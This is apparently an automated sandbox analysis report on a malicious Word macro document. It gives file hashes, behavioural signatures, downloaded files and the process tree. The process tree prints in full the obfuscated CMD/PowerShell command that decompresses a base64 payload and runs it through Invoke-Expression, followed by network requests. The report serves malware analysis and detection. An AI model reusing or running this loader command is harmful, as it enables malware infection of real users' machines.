Analysis

  • max time kernel
    138s
  • max time network
    163s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-05-2024 08:33

General

  • Target

    33b16ed72fe97d10f60353c1b04a4741_JaffaCakes118.doc

  • Size

    70KB

  • MD5

    33b16ed72fe97d10f60353c1b04a4741

  • SHA1

    34d2283b418274f2d5417194633f9ee9f4a07d19

  • SHA256

    e751449a27a5840aecae530d79ed9de9f619011b85e065006d3ccf5f7b960695

  • SHA512

    bb1a524f20f8ceb9555b0dd07cd5fc0634b21eef44dbb5ee447d1967e7903332b49630f33c1bb2c1e6a153d522258efb3260a85f4a3ceddaef4ddb79117f825f

  • SSDEEP

    768:uj0eVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o9vaHRBr/pnus:uQeocn1kp59gxBK85fBt+a9vMJ

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\33b16ed72fe97d10f60353c1b04a4741_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:5064
    • C:\Windows\SYSTEM32\CMD.exe
      CMD C:\WinDOWS\SYStEm32\CmD.EXe /C "SEt LRg= ( new-oBjeCt IO.sTreAmreadeR(( new-oBjeCt io.CompressIoN.dEFLaTesTrEAM( [iO.MEmOrysTreAM][SYSTEM.cOnvERt]::fromBaSE64STRiNg('TZDRSsMwFIZfpReBrMylil7oQmGsQ9jUwqagiDdpdtrUZklJz9bWsne3LSrenu+c7+f85P1lGxqoZzb5BIleDMheIYl0DgY5iaqHkCrEch4EdV2z6rgXRoEumXVZcPv0iGWz+OEpOIEWbSa+mLSHYBv9EtkKY8QBnDy6dmTR8u9MVAqFyURqHdN5CkF8ebdZxot/qUJDmlhbVGgdVKNANQVlz6XOcUIX1OfkrYq80KM3V9eUk912ExIwpznCoZzSDzod+JQyaIDyPgmEVBOSr5SXG2/40u/QtR3p22ArWxttxf4+1zDuXHiD0Odrc7IFzNa9dJzwpPcU/CwFStWdz98=' ) , [sYStEm.io.COMPreSSion.coMpRESSioNMoDE]::dECOMPrESs) ), [SySTem.text.EnCoding]::AsCii) ).REaDtoEND() ^|. ( $sHElLiD[1]+$SHeLlid[13]+'X')&& POwErSHEll ( ^&(\"{1}{0}\" -f'et-ITEm','G' ) ( \"{0}{1}\" -f 'EnV:L','RG' ) ).\"Va`LUE\" ^|. ( ${PS`HOME}[4]+${p`shoME}[34] +'x' )"
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3244
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        POwErSHEll ( &(\"{1}{0}\" -f'et-ITEm','G' ) ( \"{0}{1}\" -f 'EnV:L','RG' ) ).\"Va`LUE\" |. ( ${PS`HOME}[4]+${p`shoME}[34] +'x' )
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4408
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4476 --field-trial-handle=2656,i,16940681401824032220,151921362336696246,262144 --variations-seed-version /prefetch:8
    1⤵
      PID:4524

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\413.exe
      Filesize

      114B

      MD5

      e89f75f918dbdcee28604d4e09dd71d7

      SHA1

      f9d9055e9878723a12063b47d4a1a5f58c3eb1e9

      SHA256

      6dc9c7fc93bb488bb0520a6c780a8d3c0fb5486a4711aca49b4c53fac7393023

      SHA512

      8df0ab2e3679b64a6174deff4259ae5680f88e3ae307e0ea2dfff88ec4ba14f3477c9fe3a5aa5da3a8e857601170a5108ed75f6d6975958ac7a314e4a336aed0

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nsvfjwn5.3st.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/4408-48-0x0000026E75E20000-0x0000026E75E42000-memory.dmp
      Filesize

      136KB

    • memory/5064-20-0x00007FFCC1390000-0x00007FFCC1585000-memory.dmp
      Filesize

      2.0MB

    • memory/5064-29-0x00007FFCC1390000-0x00007FFCC1585000-memory.dmp
      Filesize

      2.0MB

    • memory/5064-5-0x00007FFC81410000-0x00007FFC81420000-memory.dmp
      Filesize

      64KB

    • memory/5064-8-0x00007FFC81410000-0x00007FFC81420000-memory.dmp
      Filesize

      64KB

    • memory/5064-7-0x00007FFCC1390000-0x00007FFCC1585000-memory.dmp
      Filesize

      2.0MB

    • memory/5064-6-0x00007FFCC1390000-0x00007FFCC1585000-memory.dmp
      Filesize

      2.0MB

    • memory/5064-9-0x00007FFCC1390000-0x00007FFCC1585000-memory.dmp
      Filesize

      2.0MB

    • memory/5064-10-0x00007FFC7F3B0000-0x00007FFC7F3C0000-memory.dmp
      Filesize

      64KB

    • memory/5064-12-0x00007FFCC1390000-0x00007FFCC1585000-memory.dmp
      Filesize

      2.0MB

    • memory/5064-15-0x00007FFC7F3B0000-0x00007FFC7F3C0000-memory.dmp
      Filesize

      64KB

    • memory/5064-19-0x00007FFCC142D000-0x00007FFCC142E000-memory.dmp
      Filesize

      4KB

    • memory/5064-0-0x00007FFC81410000-0x00007FFC81420000-memory.dmp
      Filesize

      64KB

    • memory/5064-22-0x00007FFCC1390000-0x00007FFCC1585000-memory.dmp
      Filesize

      2.0MB

    • memory/5064-4-0x00007FFCC1390000-0x00007FFCC1585000-memory.dmp
      Filesize

      2.0MB

    • memory/5064-38-0x00007FFCC1390000-0x00007FFCC1585000-memory.dmp
      Filesize

      2.0MB

    • memory/5064-1-0x00007FFCC142D000-0x00007FFCC142E000-memory.dmp
      Filesize

      4KB

    • memory/5064-2-0x00007FFC81410000-0x00007FFC81420000-memory.dmp
      Filesize

      64KB

    • memory/5064-3-0x00007FFC81410000-0x00007FFC81420000-memory.dmp
      Filesize

      64KB

    • memory/5064-63-0x00007FFCC1390000-0x00007FFCC1585000-memory.dmp
      Filesize

      2.0MB

    • memory/5064-64-0x00007FFCC1390000-0x00007FFCC1585000-memory.dmp
      Filesize

      2.0MB

    • memory/5064-83-0x00007FFC81410000-0x00007FFC81420000-memory.dmp
      Filesize

      64KB

    • memory/5064-86-0x00007FFC81410000-0x00007FFC81420000-memory.dmp
      Filesize

      64KB

    • memory/5064-85-0x00007FFC81410000-0x00007FFC81420000-memory.dmp
      Filesize

      64KB

    • memory/5064-84-0x00007FFC81410000-0x00007FFC81420000-memory.dmp
      Filesize

      64KB

    • memory/5064-87-0x00007FFCC1390000-0x00007FFCC1585000-memory.dmp
      Filesize

      2.0MB